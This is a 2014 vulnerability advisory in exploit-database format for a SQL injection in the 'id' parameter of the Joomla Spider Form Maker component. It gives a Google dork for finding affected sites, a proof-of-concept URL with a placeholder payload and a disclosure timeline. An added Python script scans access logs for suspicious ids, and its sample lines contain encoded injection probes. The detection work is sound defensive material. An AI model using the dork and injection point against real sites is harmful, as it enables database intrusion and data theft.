Joomla! Component com_formmaker 3.4 - SQL Injection
Author: Claudio Viviani
type: webapps
platform: php
date_added: 2014-09-24
date_updated: 2016-10-31
verified: 0
codes: OSVDB-111467
######################
# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/products/joomla-form.html
# Dork Google: inurl:com_formmaker
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
The "id" request parameter is not sanitized, which allows SQL injection.
######################
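Added example (not part of the original advisory and not the vendor's code): a log check a defender can run to find requests to com_formmaker whose "id" value is not a plain integer, including percent-encoded and double-encoded values. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PLAIN_INT_RE = re.compile(r"[0-9]+")

# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2014:10:00:01 +0000] "GET /index.php?option=com_formmaker&view=formmaker&id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Sep/2014:10:00:02 +0000] "GET /index.php?option=com_formmaker&view=formmaker&id=7%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [10/Sep/2014:10:00:03 +0000] "GET /index.php?option=com_formmaker&view=formmaker&id=7%2527 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Sep/2014:10:00:04 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2527) so the check sees the real value."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_formmaker_requests(log_lines):
    """Return (line_number, decoded_id) for com_formmaker requests with a non-integer id."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs performs the first round of percent-decoding on names and values.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_formmaker" not in params.get("option", []):
            continue
        for raw_id in params.get("id", []):
            value = fully_decode(raw_id)
            if not PLAIN_INT_RE.fullmatch(value):
                findings.append((number, value))
    return findings

if __name__ == "__main__":
    for number, value in suspicious_formmaker_requests(SAMPLE_LOG):
        print(f"line {number}: non-integer id {value!r}")
```

Access logs record only the query string, so an "id" sent in a POST body is not visible to this check.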
# Vulnerability Disclosure Timeline:
2014-09-07: Discovered vulnerability
2014-09-09: Vendor Notification
2014-09-10: Vendor Response/Feedback
2014-09-10: Vendor Fix/Patch
2014-09-10: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################